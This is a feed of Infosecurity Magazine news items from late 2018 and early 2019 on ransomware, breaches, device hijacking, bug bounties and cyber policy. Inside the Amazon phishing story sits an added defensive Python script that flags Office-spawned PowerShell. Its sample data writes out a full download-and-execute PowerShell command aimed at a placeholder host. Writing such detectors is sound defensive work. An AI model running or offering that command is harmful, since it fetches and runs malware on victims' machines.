Cyber Risk News

US Cloud Hoster Receives Christmas Ransomware 'Gift'

Info Security - Fri, 01/04/2019 - 10:00

A US cloud services provider has been struggling to shake off a ransomware attack that forced it to shut its network and hire extra help on Christmas Day.

There’s no information about the incident on the website of California-based Data Resolution, which apparently serves tens of thousands of customers from its datacenters in the US, Canada, Bermuda and the UK.

However, customer updates sent to KrebsOnSecurity indicate that the firm was infected by the Ryuk strain of ransomware on Christmas Eve. The initial attack vector was apparently a compromised user account, with servers soon infected.

The firm claimed it was forced to shut down its network to halt the spread of the ransomware, with extra staff hired in to help tackle the incident over the holiday season. However, it’s thought that the attackers were only out to extort the company, rather than looking for data to steal.

Linked to North Korea’s notorious Lazarus Group when it first appeared last year, the Ryuk strain of ransomware is believed to be responsible for the disruption of newspaper operations across the US last weekend.

Titles including the Los Angeles Times and Chicago Tribune were affected after Tribune Publishing and other facilities were hit by the ransomware.

Fred Kneip, CEO of CyberGRX, said the attack proves that organizations need to think carefully when selecting their cloud and managed hosting providers.

“It is vital for such organizations to confirm which security measures the third-party cloud provider is responsible for executing to ensure the security of the entire infrastructure,” he added.

“Hackers go for the path of least resistance, and much like a sitting duck, data is most vulnerable when it is at rest. For this reason, cloud services providers, and the organizations that welcome them as a third party, must work together to guarantee security qualifications are met.”

EU Launches Bug Bounty for 15 Open Source Projects

Info Security - Thu, 01/03/2019 - 16:36

Working in partnership with HackerOne and Intigriti, the EU announced that the European Commission will launch a bug bounty program as part of the Free and Open Source Software Audit (FOSSA).

The third edition of FOSSA will include 15 software programs: 7-zip, Apache Kafka, Apache Tomcat, Digital Signature Services (DSS), Drupal, Filezilla, FLUX TL, the GNU C Library (glibc), KeePass, midPoint, Notepad++, PHP Symfony, PuTTY, VLC Media Player and WSO2, according to EU Parliament member Julia Reda.

Reda, who has written extensively about the security risks in OpenSSL, launched the FOSSA project with her colleague Max Andersson in 2015; the project is now moving into its third phase. The first 14 bug bounty projects will commence in January 2019, with the final project beginning in March.

While bug bounty programs call upon the hacker community to come together in search of vulnerabilities, applying the crowdsourced concept to open source presents unexpected challenges, according to Tim Mackey, senior technical evangelist at Black Duck by Synopsys.

“Since bug bounty programs favor the discovery of issues with an implicit assumption resources exist to resolve found issues, any security issue disclosed in public leaves users vulnerable until a fix is found.

“Once a fix is created, that fix needs to be delivered to users. This is by far the most significant hurdle for bug bounty–based efforts in FOSS. The core challenge being an assumption valid only with commercial software – [that] there is a single release stream to upgrade. As the FOSS community knows very well, branches of releases are very common, and it may be difficult to apply a fix from one branch to another.”

Though Mackey applauded the EU for creating the bug bounty program, he argued that funding developers and security professionals to work with the communities creating their target applications is also important.

“That way not only are issues being discovered, but the overall process can be improved while addressing any issues uncovered. It should be noted that the target projects represent a very small percentage of open source projects, and that while these are obviously critical projects for the EU, it would be worthwhile for the EU to investigate expanding this effort.”

In a December 28, 2018, tweet, Reda expressed the same sentiment. “That would indeed be better, but the @EU_Commission can’t just dish out money to developers who haven’t gone through an onerous public tender process that favours large consultancies that specialize in bidding for tenders rather than Drupal development.”

Terrified PewDiePie Hacker Bids Dramatic Farewell

Info Security - Thu, 01/03/2019 - 15:59

After targeting tens of thousands of devices in the CastHack campaign, TheHackerGiraffe feared that his ethical hacking might have gone too far and decided to put an end to his attempts to educate followers on vulnerable devices.

As Infosecurity Magazine reported earlier today, TheHackerGiraffe, in partnership with j3ws3r, exploited a weakness that allowed them to take advantage of routers with Universal Plug and Play (UPnP) enabled. The duo successfully hijacked more than 70,000 Chromecast-powered smart TVs through a vulnerability the hackers said was five years old.

The campaign did prompt Google to issue a patch for Chrome for Android, resolving a security flaw that leaked information about smartphones' hardware model, firmware version and, indirectly, the device's security patch level. Despite this, TheHackerGiraffe said in a Pastebin post that he is suffering from “the constant pressure of being afraid of being caught and prosecuted [that] has been keeping me up and giving me all kinds of fears and panic attacks.”

Last year the PewDiePie hackers gained notoriety after exploiting vulnerabilities in printers accessible by anyone on the internet. In a live tweet video Thursday, @TheHackerGiraffe said that he received a direct message informing him that the FBI was building a case against him. Having been “in panic mode” for an entire month, Thursday’s message catapulted the ethical hacker into a deeper state of fear. In addition, he received multiple messages threatening to kill him and his family.

“Going after Chromecast didn’t exactly help,” he said. As a result, TheHackerGiraffe destroyed everything, from the server to the Cloudflare account to GitHub, Patreon, and even the PayPal account that was linked to Patreon. Despite his fears, the hacker stands by his actions, which were driven by his genuine desire to inform the public about the sensitive information that was being leaked in vulnerable devices.

Mike Bittner, digital security and operations manager of The Media Trust said, “The ability to access information via user agent strings will benefit exploit targeting regardless of what browser is used. App developers and browser developers should do a thorough mapping of what user information they gather and share and ensure they've obtained user consent for such activities. With GDPR regulators soon to issue penalties and similar privacy laws on the horizon, app developers will have to rely on their own custom string to override user-agent strings that conduct unauthorized data processes. By requiring user consent, these privacy laws will lift the veil on rampant online surveillance activities – whether deliberate or as a result of bugs – that have so far passed largely unnoticed by internet users.”

As of now, the hacker said, “everything is gone,” and though he plans to leave his account active, he remains uncertain as to whether he will actively use the account.

“Most of all, I'm sorry to the people who supported me on Patreon. I didn't want to leave like this, you deserve more for your money, and I'm truly sorry that I've failed to meet your demands and my promises when it comes to the guides. I guess there is a lesson to be learned here, don't fly too close to the sun and then act like you don't know you'll get burned. Well, here I am, burned and roasted, awaiting my maybe-coming end. I thank you all, thank you all so much for the past month. It's been amazing to see all of you who wanted to learn hacking/cybersecurity. Please do push on, don't give up! Stay safe, stay legal, and most of all, be civil,” TheHackerGiraffe wrote.

Website of Dublin Tram Service, Luas, Hacked

Info Security - Thu, 01/03/2019 - 14:46

Dublin-based tram service provider, Luas, confirmed through social media that its website was hacked Thursday morning. After a malicious message demanding a payment of one Bitcoin was posted to the site, the company issued a tweet asking users to refrain from clicking on the website.

It appears as though the attacker has compromised the website as a sort of punishment for Luas not having addressed security issues the malicious actor had previously reported to the company.

“The website has been taken down by the IT company who manage it and their technicians are working on it. Luas are informed this may take the day to resolve. We will update customers via Facebook, Twitter @Luas, AA Roadwatch and the media should there be any change to Luas services today. Customers can also contact Luas Customer Care on LoCall 1850 300 604, and we apologise to all Luas customers for the inconvenience,” Luas wrote on its Facebook page.

A Luas spokesperson reportedly described the website as relatively static, which means that it does not interact with other sites that hold more sensitive customer information. In commenting on the potential risks due to the hack, infosec consultant @BrianHonan explained: “Depends on the actual impact but if it is a static site (as claimed in a statement by a spokesperson for Luas) then this is nothing more than an impact on the brand and reputation of the site.”

There are no reports that service has been impacted, and Luas said it will continue to keep customers updated via Twitter and Facebook as necessary. Infosecurity Magazine contacted Luas, which responded in an email stating: “There is currently a meeting taking place within our communications department to discuss the events that occurred today with the Luas website. Once the meeting has commenced, we will be releasing a press release shortly after 16:30. Please be on the lookout for this on our Twitter as well as our Facebook.”

Hackers Threaten to Release 9/11 Data 'Trove'

Info Security - Thu, 01/03/2019 - 11:53

A notorious hacking group is claiming to have put up for sale stolen legal and other documents relating to the 9/11 terrorist attacks.

The individual(s) known as ‘The Dark Overlord’ claimed in a lengthy Pastebin notice to have hacked insurance giants Hiscox Syndicates and Lloyds of London and World Trade Center developer Silverstein Properties.

The resulting trove of 18,000 documents includes unspecified revelations on the infamous terror attacks of 2001 that killed nearly 3000.

“When major incidents like the WTC 911 incident happen, part of the litigation must involve SSI (Sensitive Security Information) and SCI (Special Compartment Information) from the likes of the FBI, CIA, TSA, FAA, DOD, and others being introduced into evidence, but of course this can't become public, for fear of compromising a nation's security, so they temporarily release these materials to the solicitor firms involved in the litigation with the strict demand they're destroyed after their use and that remain highly protected and confidential to only be used behind closed doors,” the notice claimed.

“However, humans aren't perfect and many of these documents don't become destroyed, and when thedarkoverlord comes along hacking all these solicitor firms, investment banks, and global insurers, we stumble upon the juiciest secrets a government has to offer.”

Having already released several pretty unremarkable documents in an attempt to prove it means business, the group is seeking Bitcoin donations to publicly disclose more.

It also appealed to terrorist organizations and competing nation states such as China and Russia to bid, playing up to conspiracy theories about the attacks. Additionally, the group is trying to extort money from individuals mentioned in the docs to prevent them being published.

“What we'll be releasing is the truth,” it said. “The truth about one of the most recognizable incidents in recent history and one which is shrouded in mystery with little transparency and not many answers.”

At least part of the claim appears to check out. Hiscox released a statement on Monday saying that although it wasn’t hacked directly, an advisory law firm was back in April 2018, affecting “some of our commercial policyholders and other insurers.”

“One of the cases the law firm handled for Hiscox and other insurers related to subrogation litigation arising from the events of 9/11, and we believe that information relating to this was stolen during that breach,” it explained.

The Dark Overlord has previous when it comes to online extortion, having targeted Netflix, WestPark Capital, the London Bridge Plastic Surgery clinic and other businesses.

However, experts were cautious about the group’s latest claims.

“The problem with these sorts of demands is that there is usually little proof that the threat is as simple as they are suggesting. What’s to say that they even have new evidence?” argued ESET UK security expert, Jake Moore.

“It's like the run of fake sextortion blackmail emails that many people have seen over the last few months, which claim to have footage of intimate moments. We know they aren’t real but there will always be a niggling 'what if' feeling at the back of one’s mind, even with CISOs.”

PewDiePie Hackers Take Aim at Chromecast TVs

Info Security - Thu, 01/03/2019 - 10:56

Two hackers responsible for hijacking tens of thousands of printers with messages of support for a popular YouTuber have launched a new campaign aimed at connected TVs.

At the time of writing, over 72,000 devices had been targeted in the CastHack campaign, which is designed to raise awareness that Chromecast-powered smart TVs may be leaking sensitive information about devices and the smart home to the public internet.

Ethical hackers ‘HackerGiraffe’ and ‘j3ws3r’ were able to take advantage of routers with UPnP enabled to hijack smart TVs, forcing them to play a YouTube video in support of popular vlogger PewDiePie.

The duo warned in a separate notice that the publicly exposed routers were leaking information on Wi-Fi networks and devices which could allow attackers not only to remotely play media, but also “rename your device, factory reset or reboot the device, force it to forget all Wi-Fi networks, force it to pair to a new Bluetooth speaker/Wi-Fi point, and so on.”

They urged affected users to disable UPnP on the router and stop port forwarding to ports 8008, 8443, and 8009.

“We want to help you, and also our favorite YouTubers (mostly PewDiePie),” they added. “We're only trying to protect you and inform you of this before someone takes real advantage of it. Imagine the consequences of having access to the information above.”

The two rose to fame in November and December last year after they were able to hijack connected printers around the world, forcing them to print out a message in support of PewDiePie.

However, they claim not to be responsible for the defacement of a Wall Street Journal page last month which also seemed to be the work of PewDiePie fans.

Tripwire security researcher, Craig Young, argued that in the smart home, usability often trumps security, meaning systems like Google Chromecast lack meaningful authentication checks for user requests.

“A key problem here is the misconception that LANs are actually private networks. The reality is that there can be a number of ways for external attackers to gain unauthorized access into these ‘private’ home networks,” he added.

“In this case, the miscreants have abused routers with UPnP misconfigurations but web browsing and mobile apps can also expose internal networks. My research from this past summer showing how Google Chromecast and Home could be hijacked via DNS rebinding is a prime example of this.”

Young said he hoped the CastHack campaign serves as a wake-up call for vendors to “rethink their authentication models.”

Password Manager Users Exposed After Privacy Snafu

Info Security - Thu, 01/03/2019 - 10:29

Data on over two million users of a password manager tool has been publicly exposed in another cloud storage misconfiguration incident.

Abine said on Monday that 2.4 million users who had registered for its Blur product prior to January 6, 2018 were affected. As well as password management, Blur offers the ability to mask phone numbers, credit card details and other information online to help protect user privacy and security.

The file in question, exposed through a misconfigured Amazon S3 bucket, contained email addresses, some first and last names, password hints for its MaskMe product, the last and penultimate IP addresses used to log in to Blur, and Blur passwords hashed with bcrypt using a unique salt for each.

The incident was discovered on December 13, but there is no information on how long the data was exposed for.

“Importantly, there is no evidence that our users’ most critical data has been exposed, and we believe it is secure. There is no evidence that the usernames and passwords stored by our users in Blur, auto-fill credit card details, Masked Emails, Masked Phone numbers, and Masked Credit Card numbers were exposed. There is no evidence that user payment information was exposed,” the firm clarified.

“As a best practice, you should change your Blur password. If you use the same password you use on Blur on any other service, you should change those passwords to new unique passwords as well.”

The incident is yet another reminder of the insider threat: in this case stemming from accidental misconfiguration of cloud infrastructure.

It’s a risk that has plagued organizations for years and experts predict more cyber-criminals may actively be on the lookout for exposed databases as we head into the new year.

Password manager vendors are an attractive target given the sensitive information they store.

Third Party Accessed Victorian Government Directory

Info Security - Wed, 01/02/2019 - 18:51

A list of employee names, work phone numbers and job titles available to government employees through the Victorian Government directory was reportedly accessed by an unauthorized third party. According to the Australian Broadcasting Corporation (ABC), information on approximately 30,000 Victorian public servants was stolen in a data breach, after an unknown party downloaded a portion of the directory.

Employees that might have been impacted were notified via an email message which explained: "Because of this incident you may experience increased phishing, spam and social engineering attempts via your work email address and telephone numbers. As always, you should be aware of these risks and remain vigilant when it comes to unsolicited communications via email and telephone," ABC reported.

Source: ABC News (Australia)

The breach was reported to the police, as well as to the Australian Cyber Security Centre and the Office of the Victorian Information Commissioner. In addition, a spokesperson for the Premier’s Department said in a prepared statement: “The Government will ensure any learnings from the investigation are put in place to better protect against breaches like this in the future.”

Even though the breach occurred in 2018, it is Australia’s first breach announcement for 2019. As security professionals prepare for the cyber challenges that the new year will bring, organizations around the globe are focusing on tightening up their privacy regulations and controls in the wake of back-to-back data breaches.

However, while businesses increasingly tend to privacy policies and compliance requirements, “accidents” remain common. These accidental privacy missteps can lead to the exposure of confidential, corporate or sensitive data, and they are often the result of human error or a lapse in clear thinking brought on by the fast-paced, intense nature of certain work circumstances.

The investigation into the breach of the directory remains ongoing, and it is too early to say what happened. However, Adnan Dakhwe, head of security and compliance at Vera, said that corporations are often challenged when it comes to keeping pace with employee turnover, a common and innocent mistake that can jeopardize the integrity of data regardless of the security measures and policies in place.

“Too often organizations stall in revoking access to sensitive files and corporate folders, once employees have parted ways with the organization. Keeping access permission updated in real time is essential to ensure private data isn’t jeopardized,” Dakhwe said.

Cybersecurity Guidelines Released for Healthcare

Info Security - Wed, 01/02/2019 - 17:32

Recognizing the threat to both critical infrastructure and human health and safety in the event of a cyber-attack, the Department of Health and Human Services (HHS) recently released Health Industry Cybersecurity Practices (HICP): Managing Threats and Protecting Patients, a publication nearly two years in the making.

“This publication is the result of the collaborative work HHS and its industry partners embarked on more than a year ago – namely, the development of practical, understandable, implementable, industry-led, and consensus-based voluntary cybersecurity guidelines to cost-effectively reduce cybersecurity risks for health care organizations of varying sizes, ranging from local clinics, regional hospital systems, to large health care systems,” wrote Eric Hargan, deputy secretary of HHS.

The document is the result of a collaborative partnership between industry and government, prompted by a mandate set forth by the Cybersecurity Act of 2015, Section 405(d), to develop practical cybersecurity guidelines to cost-effectively reduce cybersecurity risks for the healthcare industry, according to an HHS press release.

“The healthcare industry is truly a varied digital ecosystem. We heard loud and clear through this process that providers need actionable and practical advice, tailored to their needs, to manage modern cyber threats. That is exactly what this resource delivers; recommendations stratified by the size of the organization, written for both the clinician as well as the IT subject matter expert,” said Erik Decker, industry co-lead and chief information security and privacy officer for the University of Chicago Medicine, in the press release.

Though consensus-based and intended to help lead the industry toward best practices and procedures, the guidelines are voluntary. The processes put forth should – if implemented and followed – achieve the three core goals of reducing cybersecurity risks while supporting voluntary adoption and implementation and ensuring that the content within the guidelines remains actionable, practical, and relevant to a range of health care stakeholders.

Attribution Unknown in Tribune Publishing Attack

Info Security - Wed, 01/02/2019 - 16:58

The malware attack that disrupted the printing operations of the Chicago Tribune and other Tribune Publishing newspapers, including the Los Angeles Times, remains under investigation with no clear evidence that points to a source responsible for the attack, according to the Chicago Tribune.

“Sunday print editions were delivered in its markets across the U.S. but did not contain classified ads and some paid death notices, which share a common system disrupted by the malware,” the Chicago-based company said.

The attack, which was reported to the FBI on December 28, 2018, disrupted newspaper delivery to Los Angeles Times subscribers, for which the company apologized in a note to readers.

As is often the case with high-profile attacks, people want to know what happened, yet the investigation remains ongoing despite some reports attributing the attack to the Lazarus Group, an advanced persistent threat (APT) group linked to North Korea. Some have been inclined to point to North Korea because an unidentified source familiar with the investigation reportedly said the malware had been identified as Ryuk ransomware, which has previously been linked to the Lazarus Group.

“While there’s plenty of speculation, there are relatively few facts available about this incident at the moment,” said Tim Erlin, VP, product management and strategy at Tripwire. “It’s unclear at this point whether this was a targeted or opportunistic attack. The impact to newspaper delivery could be collateral damage or the intended result. We should all be wary of jumping to conclusions without sufficient information in hand. The headline that grabs the most clicks may not be the most accurate.”  

Not everyone is heeding Erlin’s advice, however, which prompted Robert M. Lee, CEO and founder of Dragos Inc., to turn tweets into a blog post explaining why attribution is not transitive, particularly in the case of this malware attack.

“Shortly after Tribune Publishing lost operations and ability to print papers the press highlighted that there was a cyber attack,” Lee wrote. “The attack was highlighted as a targeted attack by a nation-state. This was all related to one anonymous insider at the company telling the media. Thus, early on I, and many others on social media, called for calm and patience while the details became public.”

EU Looks to Reduce Exposure to Chinese 5G Risk: Report

Info Security - Wed, 01/02/2019 - 11:44

The European Union is hoping to lead a more coordinated response to security concerns over Chinese 5G equipment makers, it has emerged.

Brussels wants to ensure it doesn’t end up with a situation where member states have unwittingly allowed Chinese kit to dominate across the region, according to the FT.

One unnamed diplomat told the paper that although 5G auctions can raise billions for governments, the EU is “urging everyone to avoid making any hasty moves they might regret later.”

“It’s quite a serious strategic problem for the EU and we haven’t properly mapped the exposure,” they added. “The problem is every country is interested in the 5G auction because it’s a massive payday. Once these auctions have happened you need to avoid a situation where you end up with the entire continent being with one [equipment] provider.”

The EU wants to map its exposure to Chinese technology as national security concerns mount.

The US, Australia, New Zealand, Taiwan and Japan have all banned Huawei products on security fears to a lesser or greater extent, despite the firm repeatedly protesting its innocence.

In the UK, the Shenzhen giant has been forced to pledge £1.5bn over the next five years in a bid to address national security concerns raised by GCHQ. In spite of this, BT has claimed Huawei equipment will not be used in its core 5G network — although others have claimed the distinction between core and edge collapses in these next generation networks.

Australian Signals Directorate boss Mike Burgess argued last month that “high risk” vendors have been banned from the nation’s 5G networks because of the risk of “unbounded extrajudicial directions from a foreign government.”

Acknowledging that its efforts to mitigate 5G supplier risk would be a “complicated matter,” the EU diplomat told the FT that Brussels could play a more prominent role in helping to audit, monitor and vet companies.

Vietnam's New Cyber Law Threatens Free Speech

Info Security - Wed, 01/02/2019 - 11:13

The Vietnamese government has passed a sweeping new cybersecurity law which critics claim will help the one-party state continue to crack down on free speech.

The law will force internet companies like Facebook and Google to open offices in the country, store data on users locally and allow access to that data at the request of the authorities.

Social sites will be forced to remove any content deemed “toxic” — effectively giving the authorities a free hand in online censorship.

Businesses now have 12 months to comply with the new legislation, which was passed back in June.

Yet with tens of millions of active users in the country, the likes of Facebook could theoretically push back — especially as Hanoi needs the help of globally connected platforms as part of its ongoing bid to turn Vietnam into a south-east Asian technology hub.

“In the country’s deeply repressive climate, the online space was a relative refuge where people could go to share ideas and opinions with less fear of censure by the authorities. With the sweeping powers it grants the government to monitor online activity, this [law] means there is now no safe place left in Vietnam for people to speak freely,” argued Amnesty International’s director of global operations, Clare Algar, in June.

“This law can only work if tech companies cooperate with government demands to hand over private data. These companies must not be party to human rights abuses, and we urge them to use the considerable power they have at their disposal to challenge Vietnam’s government on this regressive legislation.”

The legislation brings Vietnam into line with repressive one-party states like China, whose censorship apparatus is notoriously effective.

It remains to be seen whether Hanoi’s latest move will stifle tech innovation and commercial digital development in the country, as has been predicted.

Hackers Target North Korean Defectors

Info Security - Wed, 01/02/2019 - 10:06

Personally identifiable information (PII) on nearly 1000 defectors from North Korea has been stolen in a cyber-raid, the South Korean government revealed late last week.

It’s believed that one of the 25 “Hana” support centers for defectors in the country was targeted by a classic phishing attack.

“Recognizing a possibility of one personal computer at the Hana Center in North Gyeongsang Province having been hacked, we carried out an on-site probe on December 19 in cooperation with the provincial government and the center and confirmed the computer was infected with a malicious code,” the Ministry of Unification said.

“In that computer, there was a file containing personal information of North Korean defectors. The file was confirmed to have been leaked.”

The phishing campaign involved the hijacking of an internal email account to make the phishing message appear more legitimate, according to reports.

Around 30,000 defectors currently live in the affluent south, but many still have family north of the border, which could make their personal information of interest to Pyongyang. Names, addresses and dates of birth were among the stolen details.

Those affected have been informed, and the ministry is said to be taking steps to air-gap computers storing sensitive data from 2019 to mitigate the risk of such attacks — although this is the first major breach of defectors’ personal data, according to Yonhap News.

An unnamed ministry official was reluctant to attribute the attack but all eyes will be on Pyongyang, given the hermit nation has become a prolific offensive state actor.

In October, FireEye published research identifying at least three main North Korean state-sponsored hacking groups operating today: Lazarus, APT38 and TEMP.Hermit.


Amazon Order Confirmation Phishing Scam

Info Security - Mon, 12/24/2018 - 18:24

Anyone who relied on e-commerce giant Amazon to order their holiday gifts should be cautious when receiving order confirmation emails: EdgeWave has reportedly discovered a new and highly sophisticated malspam campaign sending fake Amazon order confirmation messages.

The messages are reportedly quite convincing, and include subject lines that read "Your order," "Amazon order details" and "Your order 162-2672000-0034071 has shipped."

According to BleepingComputer, “When you open these emails, you will be shown an order confirmation that states your item has shipped, but without any details regarding what was ordered or tracking information. It then tells the recipient to click on the Order Details button in order to see more information.”


Unsuspecting users who click the link, believing they are downloading a Word document named order_details.doc, are then instructed to “Enable Content” so that the order can be viewed properly. In reality, enabling content runs the document's macros, which execute a PowerShell command that reportedly downloads and executes the Emotet banking Trojan.

EdgeWave told BleepingComputer that while its researchers were testing the malicious document, Emotet was saved to disk as keyandsymbol.exe even though the Trojan was served under the name mergedboost.exe.

"Interestingly, these other servers are in Houston and Lansing. Playing Dora the Explorer for a moment, we’ve encountered a compromised email server in Columbia sending phishing email with a link to a server in Indonesia that downloads malware which then contacts compromised servers in the United States,” EdgeWave reportedly said.
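As an added example (not code from EdgeWave, BleepingComputer or the original article), the following Python triages process-creation events for the delivery chain described above: an Office application spawning PowerShell with a download cradle that drops an executable into a user-writable directory. The events, hostnames, paths and URL are constructed sample data; only the file names keyandsymbol.exe and mergedboost.exe come from the report.

```python
import re

# Constructed sample process-creation events (loosely modelled on Sysmon
# Event ID 1 fields); hostnames, paths and command lines are made up.
SAMPLE_EVENTS = [
    {"host": "ws01",
     "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -nop -w hidden -c (New-Object Net.WebClient)"
                r".DownloadFile('http://example.invalid/mergedboost.exe',"
                r"'C:\Users\Public\keyandsymbol.exe');"
                r"Start-Process C:\Users\Public\keyandsymbol.exe"},
    {"host": "ws02",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\inventory.ps1"},
    {"host": "ws03",
     "parent": r"C:\Program Files\Microsoft Office\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c echo hello"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Strings typical of a PowerShell download cradle.
CRADLE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|"
                    r"\biex\b|invoke-expression|net\.webclient|-enc\w*\b", re.I)
# An executable written to a user-writable directory.
DROP_PATH = re.compile(r"(\\users\\public\\|\\appdata\\|%temp%)[^\s']*\.exe\b", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    # Each indicator adds a reason; two or more make the event high severity.
    parent, child, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
    reasons = []
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {child}")
    if child in {"powershell.exe", "pwsh.exe"} and CRADLE.search(cmd):
        reasons.append("download cradle in PowerShell command line")
    if DROP_PATH.search(cmd):
        reasons.append("executable in user-writable path")
    severity = "high" if len(reasons) > 1 else ("medium" if reasons else None)
    return {"host": ev["host"], "severity": severity, "reasons": reasons}

def triage(events):
    # Keep only events that tripped at least one indicator.
    return [r for r in map(score_event, events) if r["severity"]]
```

Running triage(SAMPLE_EVENTS) flags ws01 as high (all three indicators) and ws03 as medium (Excel spawning cmd.exe), while the scheduled inventory script on ws02 is left alone.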


Grad Makes ROTC History with Cybersecurity Degree

Info Security - Mon, 12/24/2018 - 17:30

Southern University celebrated a first in its history with the graduation of Davonne Franklin, 22, a member of the Army National Guard who was the school’s first ever cybersecurity graduate.

Franklin enrolled in the ROTC and attended Southern University after graduating from McKinley High in Baton Rouge. When he completed his basic training, he returned to Louisiana as a private with the goal of studying cybersecurity at Southern, where he was able to take part in an undergraduate research project in cybersecurity for the U.S. Department of Defense, according to The Advocate.

Now a second lieutenant, the graduate will move on to become a cybersecurity officer, working to strengthen defenses against cyber-terrorism. "The biggest existential threat that faces our national security is cybersecurity," said Capt. Troy Glover, a member of the Southern University Army ROTC staff who spoke with The Advocate.

"I came back more focused," Franklin reportedly said. "When I returned, I knew I wanted to join Army ROTC and become an officer, and I wanted to change my field in the National Guard to cybersecurity. I also wanted to pursue a degree in computer science. I just needed that slight chance," Franklin said. "Growing up African-American, you can feel things are denied you."

Cybersecurity degrees are growing more popular around the globe, and curiosity about the industry is driving demand for more detail on what such a degree entails. According to IT Governance, the three key pillars of a cybersecurity strategy are people, process and technology.

Given the increased frequency and costs associated with attacks, educating users about cybersecurity is a critical part of securing the enterprise. “Cyber-attacks can disrupt and cause considerable financial and reputational damage to even the most resilient organization. If you suffer a cyber-attack, you stand to lose assets, reputation and business, and potentially face regulatory fines and litigation – as well as the costs of remediation,” according to IT Governance.


New App Protects User Data on the Internet

Info Security - Mon, 12/24/2018 - 15:12

In response to the data privacy questions that erupted in the aftermath of the Facebook-Cambridge Analytica scandal, startup FigLeaf, co-founded by CEO Slava Kolomeichuk and CRO Yuriy Dvoinos, is developing an app that will help users understand how their personal information has been affected.

The new app is slated for use across different platforms and will include features that allow users to control access to their private information.

"We want to empower users and give them the tools to have a choice to remain private online," Dvoinos told CBS News in the company's first public interview about its plans.

The 100-person team has been busy developing a viable solution to the privacy problem. “Privacy is a social necessity. This is what makes us different, interesting and hence, human. If we can provide people a choice to be private some of the time, we give them the opportunity to fully embrace their own creativity,” Kolomeichuk says on the company website.

By scanning the dark web, the app is able to gauge how much of the user’s personal data has been compromised. The app, still in beta and being tested, will reportedly provide users with the tools necessary to take back control of their data. Dvoinos told CBS News that even if a user chooses to remain completely private and not share any data, they should still be able to enjoy the internet.

"Right away, the customers can see how and what their exposure is like," Pankaj Srivastava, FigLeaf's COO and CMO, told CBS News. "So when we think about the function for our privacy app, Figleaf, when we think about it and think one is first we need to understand how you are exposed. Next we need to secure that information."


UK Launches Long-Awaited Cyber Skills Strategy

Info Security - Mon, 12/24/2018 - 11:30

The UK government has launched a new cybersecurity skills strategy designed to reduce industry shortages, and a new independent body to help shape the future of the profession.

The Initial National Cyber Security Skills Strategy sets out not only to recruit more skilled professionals into the industry but also to raise the awareness levels of the general workforce, improve education and training, and ensure the UK has a “well structured and easy-to-navigate” profession.

To that end, a new UK Cyber Security Council will receive £2.5m of public funding to help in its mission to “lay the structural foundations” of the profession.

It will appoint independent ambassadors to promote careers in cybersecurity; launch a refreshed CyberFirst brand in 2019; and commit to investing in projects to develop the next generation of talent.

At this stage there doesn’t seem to be an awful lot of detail, although the strategy itself is currently in a “Call for Views” phase which ends on March 1, 2019.

Talal Rajab, head of cyber and national security at industry body techUK, urged members to submit their feedback.

“Only through collaboration between government, industry and academia will the cyber skills gap be bridged and initiatives like CyberFirst and the work around developing a Cyber Council are significant work streams which techUK and industry will continue to support,” he added.

“Skills are vital to the development of the UK cybersecurity sector and attracting skilled talent is a constant challenge for industry, making this wide-ranging strategy most useful as a starting point for renewed efforts from both government and industry.”

New government figures suggest that over half (57%) of all UK firms and charities have a “basic technical cybersecurity skills gap.” The global shortfall of skilled professionals now stands at nearly three million.


Over 500K School Staff and Students Hit by Breach

Info Security - Mon, 12/24/2018 - 10:43

The personal data of more than half a million staff and students of San Diego high schools from the past decade is now likely in the hands of hackers, it has emerged.

A statement from the San Diego Unified School District on Friday revealed that unauthorized access was achieved by a simple phishing campaign which compromised 50 staff log-ins back in January.

It was only 10 months later that IT staff detected the intrusion, with the threat finally eliminated on November 1.

Although GDPR regulators require 72-hour mandatory notifications, in the US police often request a delay to give them time to investigate and possibly apprehend the suspect.

An individual has apparently been identified and all stolen credentials are now useless, but the damage has arguably already been done.

Breached data includes: first and last name; date of birth; mailing and home address; phone number; student enrolment info; Social Security and/or State Student ID numbers; contact information on parents, guardians and emergency contacts; and staff benefits and payroll info including routing and account number, tax info, and salary info.

Data is said to go as far back as the 2008-9 school year.

There’s plenty in there for financially motivated cyber-criminals to monetize, not least the Social Security numbers of students.

Over one million US children fell victim to identity fraud in 2017, resulting in losses of $2.6bn, according to Javelin Strategy & Research. It’s thought that because they have limited financial records on file, children offer fraudsters a bigger opportunity to open fake accounts and the like in their name.

The case also highlights the continued threat from phishing: it featured in 93% of all data breaches analyzed by Verizon last year.


Nearly 20,000 Orange Modems Leaking Wi-Fi Passwords

Info Security - Mon, 12/24/2018 - 10:12

Nearly 20,000 Orange modems are being targeted thanks to a vulnerability leaking their SSID and Wi-Fi passwords, researchers at Bad Packets have warned.

The firm’s honeypots first picked up the attack traffic targeting Orange Livebox ADSL modems. After conducting a simple Shodan search, chief research officer Troy Mursch found 19,490 such devices leaking their Wi-Fi credentials in plain text.

In addition, over 2000 were not leaking information but still classed as exposed to the internet.

“Many of the devices found to be leaking their WiFi password use the same password to administer the device (password reuse) or have not configured any custom password – so the factory default ‘admin/admin’ credentials are still applied,” he explained.

“This allows any remote user to easily access the device and maliciously modify the device settings or firmware. In addition, they can obtain the phone number tied to the modem and conduct other serious exploits detailed in this Github repository.”

Most of the affected devices were located in Spain, and the attack traffic was also traced back to an IP address associated with a Telefonica Spain customer.

“While we can only guess what the motive was behind these scans, it’s interesting to find the source is physically closer to the affected Livebox ADSL modems, than say a threat actor in another country,” Mursch continued. “This could allow them to connect to the WiFi network (SSID) if they were near one of the modems indexed by their scans.”

The flaw in question has been assigned CVE-2018-20377. At the time of writing, Orange had acknowledged the flaw and said it was investigating.

